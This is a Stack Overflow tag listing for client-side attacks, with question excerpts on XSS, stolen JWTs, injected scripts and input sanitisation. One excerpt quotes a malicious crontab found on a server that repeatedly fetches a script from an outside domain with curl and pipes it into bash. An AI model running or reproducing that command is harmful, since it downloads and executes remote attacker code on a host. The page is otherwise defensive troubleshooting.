Stack Overflow
Stack Overflow

Questions tagged [client-side-attacks]

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side script into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. -Source Wiki

56 questions
2
votes
0 answers

Injection Script, what does it do?

Operating a web store via one of the popular platforms and had an order come through with the following script embedded in several of the fields: name, address, etc. I'm trying to understand what the script accomplishes. I've removed any way for it…
A Bomb
  • 21
  • 3
2
votes
1 answer

What exactly is meant by 'External Service Interaction' reported by Burp Suite?

Upon running the Burp Security Suite on our web application, I'm getting an issue like 'External Service Interaction' in a page where there's an textbox for getting email addresses. Think of it like inviting other people to our website. The page is…
user937999
2
votes
0 answers

Avoid remote website inclusion

I recently saw a few malicious domains including my website pages. I initially suspected of iframe inclusion, but I already had Header always set X-Frame-Options SAMEORIGIN configured in my httpd.conf. Other ideas were about malware Javascript…
Fabio B.
  • 9,138
  • 25
  • 105
  • 177
2
votes
1 answer

How can you stop resending a webpage when the client doesen't return an answer to the server

I want to host a web server, but there's something in my way: DDoS attacks. I'm very new to hosting a web server, and i just recently found out about them. I might be wrong, but I know that when bots send requests to the server, they do not return…
user7339340
  • 115
  • 1
  • 1
  • 3
1
vote
1 answer

Saving access token and refresh token to local storage but encrypted?

I've been studying front-end developing using ReactJS and back-end using ASP.NET Core and as a first step I've been developing an authentication/authorization (login) system. I've implemented access token that expires in 1 hour and refresh tokens…
asallan3
  • 43
  • 5
1
vote
5 answers

Does somebody knows about this: repo1.criticalnumeric.tech

I found that in the company server there is a crontab that runs with this code: */3 * * * * curl -sk "http://repo1.criticalnumeric.tech/kworker?time=1612899272" | bash;wget "http://repo1.criticalnumeric.tech/kworker?time=1612899272" -q -o /dev/null…
umeixueiro
  • 21
  • 4
1
vote
2 answers

How to prevent hackers from modifying the product price in e-commerce

I'm sure this is a pretty universal question, but I somehow can't find any info on it online. I have an e-commerce site with different product prices. I then use Javascript to calculate the total price, but where exactly should I store each pricing…
Ben Viatte
  • 485
  • 1
  • 5
  • 16
1
vote
2 answers

How to Completely Prevent Web Form Input Text Item change

I have this simple web-form
Saddam Meshaal
  • 532
  • 3
  • 13
  • 30
1
vote
2 answers

Handle stolen JWT?

I'm building a nodejs server with jwt authentication. At the moment my jwts have a expiration time of 1 month. If the user goes on the loggin page, I check if his request contains a valid jwt, if yes, he don't have to type in his username and…
mcAngular2
  • 299
  • 1
  • 14
1
vote
2 answers

Javascript injected in all drupal websites of a server

From last few days, my sites have been come across malicious attack. When I open a site http://site1.com it first goes to redirected on another page (possibly an ad page). In chrome browser when I try to diagnose the problem through console (F12), I…
Sohel Pathan
  • 367
  • 3
  • 13
1
vote
1 answer

Sanitise text input for display on HTML page

Have built a chat program for our website. A part of tHe program does allow a web page comment area for chatting about the page. So there is a text input so text is entered and redisplayed on the page. Obviously that is potentially risky. So in…
wingyip
  • 3,465
  • 2
  • 34
  • 52
1
vote
0 answers

Security Attacks possible on TokenBased Authentication?

I have designed a web application which uses very simple implementation of JWT token's to provide Authentication/Authorization. My Implementation : There are two types of urls's public and secure. Public urls are to generate token with…
Mohd Waseem
  • 1,244
  • 2
  • 15
  • 36
1
vote
1 answer

how to prevent the clients from debugging the code in javascript using developer tool

We have the angularjs application where we have different roles associated to the users. For ex: the two roles are Admin and Local. Based on the role, we show some menu items for the Admin and adds more features/screen to the Admin . The userInfo…
rahulmr
  • 681
  • 1
  • 7
  • 19
1
vote
1 answer

How Jsoup could clean XSS javascripts and maintain some HTML tags?

I want to clean some HTML Strings in my application in Java from XSS attacks using Jsoup. But i want to have also and tags. Is it this possible with this library?
harryssuperman
  • 465
  • 3
  • 7
1
vote
0 answers

Making a Chrome plug-in of Suricata/Snort for intrusion detection on client side

I want to use Suricata turning it into a Chrome browser plugin for internet based intrusion detection. Specifically, I want to detect/prevent malicious attack of access to cache data.
Ritwik
  • 11
  • 2
1
2
3 4